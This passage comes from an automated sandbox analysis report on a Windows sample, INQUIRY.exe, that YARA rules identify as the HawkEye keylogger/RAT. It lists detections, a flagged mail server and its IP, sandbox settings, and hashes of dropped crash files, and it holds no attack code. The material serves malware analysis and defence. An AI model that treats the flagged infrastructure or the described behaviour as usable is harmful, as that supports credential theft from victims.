                    32.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                    27.2.INQUIRY.exe.25e0000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
                    28.2.INQUIRY.exe.2240000.2.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    28.2.INQUIRY.exe.2240000.2.unpack | 100% | Avira | SPR/Tool.MailPassView.473
                    1.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | TR/AD.MExecute.lzrac
                    1.2.INQUIRY.exe.400000.0.unpack | 100% | Avira | SPR/Tool.MailPassView.473

                    Domains

                    Source | Detection | Scanner | Label
                    mail.iigcest.com | 0% | Virustotal | -

                    URLs


                    Domains and IPs

                    Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    whatismyipaddress.com | 104.16.154.36 | true | false | - | high
                    mail.iigcest.com | 166.62.27.57 | true | true | - | unknown
                    121.205.6.0.in-addr.arpa | unknown | unknown | true | - | unknown

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://whatismyipaddress.com/ | false | - | high

                          URLs from Memory and Binaries

                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comINQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.galapagosdesign.com/INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.comnc.INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://whatismyipaddress.comINQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/cabarga.htmluINQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.carterandcone.comTCINQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://go.microsoft.INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://whatismyipaddress.comINQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://go.microsoft.LinkId=42127INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.jiyu-kobo.co.jp/jp/INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://en.wINQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.carterandcone.comnINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.carterandcone.comlINQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.carterandcone.comleINQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.fontbureau.comkINQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.fontbureau.comm=INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              http://www.founder.com.cn/cnINQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designers/frere-user.htmlINQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.jiyu-kobo.co.jp/sINQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlINQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.comlvfetINQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.fontbureau.comsINQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.carterandcone.com$pINQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  http://www.fontbureau.com/designershqINQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.jiyu-kobo.co.jp/INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers8INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.comalsd=INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      low
                                                                      http://www.tiro.comicINQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.jiyu-kobo.co.jp/_INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.carterandcone.comsmINQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown

                                                                      Contacted IPs


                                                                      Public

                                                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                                                      104.16.154.36 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                                                      104.16.155.36 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                                                      166.62.27.57 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                      Private

                                                                      IP
                                                                      192.168.2.1

                                                                      General Information

                                                                      Joe Sandbox Version: 31.0.0 Red Diamond
                                                                      Analysis ID: 319686
                                                                      Start date: 18.11.2020
                                                                      Start time: 15:00:58
                                                                      Joe Sandbox Product: CloudBasic
                                                                      Overall analysis duration: 0h 14m 29s
                                                                      Hypervisor based Inspection enabled: false
                                                                      Report type: full
                                                                      Sample file name: INQUIRY.exe
                                                                      Cookbook file name: default.jbs
                                                                      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed: 40
                                                                      Number of new started drivers analysed: 0
                                                                      Number of existing processes analysed: 0
                                                                      Number of existing drivers analysed: 0
                                                                      Number of injected processes analysed: 0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode: default
                                                                      Analysis stop reason: Timeout
                                                                      Detection: MAL
                                                                      Classification: mal100.phis.troj.spyw.evad.winEXE@46/34@17/4
                                                                      EGA Information: Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 82% (good quality ratio 80.2%)
                                                                      • Quality average: 85.6%
                                                                      • Quality standard deviation: 23.6%
                                                                      HCA Information:
                                                                      • Successful, ratio: 87%
                                                                      • Number of executed functions: 97
                                                                      • Number of non-executed functions: 398
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe
                                                                      Warnings:
                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.255.188.83, 51.104.144.132, 205.185.216.42, 205.185.216.10, 52.155.217.156, 20.54.26.129, 52.147.198.201, 92.122.213.247, 92.122.213.194, 51.104.139.180, 13.64.90.137
                                                                      • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      Time | Type | Description
                                                                      15:01:59 | API Interceptor | 70x Sleep call for process: INQUIRY.exe modified
                                                                      15:02:07 | API Interceptor | 4x Sleep call for process: dw20.exe modified
                                                                      15:02:22 | API Interceptor | 2x Sleep call for process: WerFault.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                      Domains

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                      ASN

                                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INQUIRY.exe_9acf60ae8258c649d949998398a696799dd6ab7_31a5ab7c_0466ea22\Report.wer
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19244
                                                                      Entropy (8bit):3.7689860404632216
                                                                      Encrypted:false
                                                                      SSDEEP:192:OYcm0I9+HzHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS27P:X4HziBUZMXIjB7vqsSt/u7sSX4It5a8
                                                                      MD5:C8F2F641B01A44390EE72AB0291023BB
                                                                      SHA1:73DD3194D00A241D6506AC88E94A31C0872AAD9E
                                                                      SHA-256:253F7456400E5CD904BCCB71A341A89DDED83968C28A9ECDED505C38833040EE
                                                                      SHA-512:D10C15F5E4E81ACB4489DFD0CD212672A3396CF5CCCC38D76A5225B0E68B72EC05B22D9F2C08377CE5736CEAE4D545DB1C0DCF44A99D889EA64C797035DA4CE5
                                                                      Malicious:true
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INQUIRY.exe_9acf60ae8258c649d949998398a696799dd6ab7_31a5ab7c_1a2a4622\Report.wer
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19246
                                                                      Entropy (8bit):3.7687586959631867
                                                                      Encrypted:false
                                                                      SSDEEP:192:cg/3+HVHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274ItF:B/uHViBUZMXIjB7vqsSt/u7sSX4It5a0
                                                                      MD5:0F2339E59B1382CFEBA7C65E0204DB37
                                                                      SHA1:869CD3F293F945FE0B794C50EF4899CCC318B52C
                                                                      SHA-256:EBD1A41084A86F927C8E65CD72B32DC6B9A5E16C62205A82F52EC9B364A79947
                                                                      SHA-512:1C8564A5E898644CBCF53664A1D39E26ADF5BE1DBA3DB233E2C325BA846520DACDFAC2DF7243F21C9AF1F78A9F2CCB035C1C2BCFB919FD0B1A8CEF54D657D231
                                                                      Malicious:true
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_009f3881\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7579185842846132
                                                                      Encrypted:false
                                                                      SSDEEP:192:EZ+HLTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274ItZ:HHLVjB7vqsSt/u7srX4ItZ
                                                                      MD5:FBCEA239031271D5FC498B4CCFF7FFC5
                                                                      SHA1:A317C75282FB18400F1DA04EE684D29A375F5919
                                                                      SHA-256:96D8D97D8A8C4F15EE1E0D1B75A78F8BEEBF3845EDD82E72E8D46F7F92F6B92E
                                                                      SHA-512:6DF096B4314D9F1E9E7672055DA379DE2270F970E3F5F2CE1026322C9CD0F52927DC652D3806CCCCA12662BD9121B0A8BC1528306CB63976184EF87AA99F2261
                                                                      Malicious:false
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_18bf7163\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18448
                                                                      Entropy (8bit):3.7581897365137853
                                                                      Encrypted:false
                                                                      SSDEEP:192:21+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274Itu:VH0VjB7vqsSt/u7srX4Itu
                                                                      MD5:5856CBF6D7376E0047754E49722CDE9A
                                                                      SHA1:051FCA316BE423B3D5475C843573239C084BB0AE
                                                                      SHA-256:AC6415AD3FD401C7E0B4547121023266CF2ABBC2F75A35FCCB2763DB2B36AEF3
                                                                      SHA-512:560A4FF5B36ED1ABA6F86856AE12A665208CED8A67893FC36246CC049C7B0DD9872AB2DC26E552D40E24A384B3441555442CE3505138F61EC24DDFE832C1A25F
                                                                      Malicious:false
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1a860a22\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7573567572608084
                                                                      Encrypted:false
                                                                      SSDEEP:192:2Mlg+HPTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7stS274Itw:bNHPVjB7vqsSt/u7stX4Itw
                                                                      MD5:BEA478764A49288FAE5D2C58DEA9E7F7
                                                                      SHA1:8601AF0DC1CFDBA1A6FD96882B78E44800F059AF
                                                                      SHA-256:D55EC04B23C4335716973DD1BE81A228576593188597B2FF2422E7CA596DAC57
                                                                      SHA-512:15AA099538B4D44703D965C393892452B5D204568CFE062308F35741F8C10FC87738AFF0CE2AEE3B2D9C3E2770C774C4216A053554CF554073FD0335AC46035B
                                                                      Malicious:false
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1b4a9849\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7581638227883536
                                                                      Encrypted:false
                                                                      SSDEEP:192:B8y+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274Itj:kH0VjB7vqsSt/u7sSX4Itj
                                                                      MD5:4E9027E389CF59A8E643336BC538513A
                                                                      SHA1:5FC1F51DA07FA44C69EF4DC8C46AF896176E76F0
                                                                      SHA-256:5E35F7BEAF0E442F1923D24380FE8A32309325B08F6C6815AC221527631AEBEF
                                                                      SHA-512:77A94A00184189C927B7EF97D7308D0E5B629B080DF48CA7DB95BF8C0210E2E37F06377AD55CE8187E4E60F07AB2099AAC49A6B52D76EC1BFF39BC666F852C77
                                                                      Malicious:false
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:15 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7008087
                                                                      Entropy (8bit):4.7220376102848896
                                                                      Encrypted:false
                                                                      SSDEEP:98304:dYMlAY0P5P9Hch291r+VT8b1XanA8ngFYT3bRnCSljd5XSoU+zR8MX:djAYaP9HNgGwFJ/5Xv
                                                                      MD5:B959EB0600252402A18BFCF647E10552
                                                                      SHA1:0626EAF638F4FEF2920A77E3BC56740E52E126C5
                                                                      SHA-256:92E8F1B478C7EB956AD40A33A3739229D6C1ACB0793A32A327CF426C6CCE2A77
                                                                      SHA-512:A61C0109EBA44B3ECECA58A5D3DE320553FEE491B820638D50B266122604F6BD3B75660C745BA011C717FEA2E24C15C4AAFC5D49CCF254478E99D55B5A5EF00C
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E55.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8294
                                                                      Entropy (8bit):3.7043697131252022
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNii06Yb6YPI6Egmf0uuS8+prk89bb9sfnpm:RrlsNiJ6s6Yw6EgmfPuSRb2fE
                                                                      MD5:878E1942EA193A0986BDC8426E80F69E
                                                                      SHA1:D47C31FC7B12BA957F6D61AB8E0C5FFDCE2585D6
                                                                      SHA-256:B31B2972C250517AF12D08CD15DE379C47B1FAA215DF97926D7227400370543A
                                                                      SHA-512:BEBD8D8ECEBD5466E4CBC6303EBEC7879A8D6C02057DADCCA7B56E117F426849E56E3E9BBF21F477C3D2EA83ECC2D55D427F756E57942950AA5826416B2B6426
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.6.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3043.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5640
                                                                      Entropy (8bit):3.724414552767444
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i+s6ROcYZtuvUubSfaQgsB+aM1911fH/m:Rrl7r3GLNi+s6ROcYZtuvUubS7+p191g
                                                                      MD5:3ACCC42FCA2CB02425C8B5FEB60C324D
                                                                      SHA1:2EF2A521BF4C9A6F3FA58C56A803D919B985BBE7
                                                                      SHA-256:2ECDDEC9C38A915BD80665FAFBE7779795C1342454EA3C57D8D682FA52A2089E
                                                                      SHA-512:B0813E81B0FA83DEF1700D5B4199F8CA0A8148B07319D158FE513094230C2A355E977F31BE21656C0A92D8B6B46B38C523E21582FEC509DEDA162DACEF37ADD8
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.0.<./.P.i.d.>.........
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3106.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.510625392276364
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8BP8fm8M4JOWjZF5+q89zCpJP6v4HTd:uITfI4aSNKJOgtsCvP6vMTd
                                                                      MD5:A8469566DD777304B6389CE1094F7028
                                                                      SHA1:E5C9D56772A35FD2D8DCA937B993B3F4C092F9B9
                                                                      SHA-256:507E6016E8640ECE9E662D46F13B0C0322C64175A78028E65A471791CF7EB03D
                                                                      SHA-512:8B6460D77CE2B91024D10532ABD27E990F723E906AABC28F2EC02F85301A9A37953DE7BACEBFA1AD1D85FB11F2ECDD7A443C03F3598C42EBD7A9A48A5FF51F43
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER310F.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.454622515385555
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bw08fm8M4JFKg7FT9P+q8v5bpJP6v4H+d:uITfS4aSNYJFKMKVvP6vM+d
                                                                      MD5:E90B24327D824129769567901CF443FD
                                                                      SHA1:136452E7C618931A5D39470F24C97B3CE9FB8858
                                                                      SHA-256:27C78A3143AFDA038D4939AED93E3CB8B249CC9032C6568D01BAC4B57B298BAE
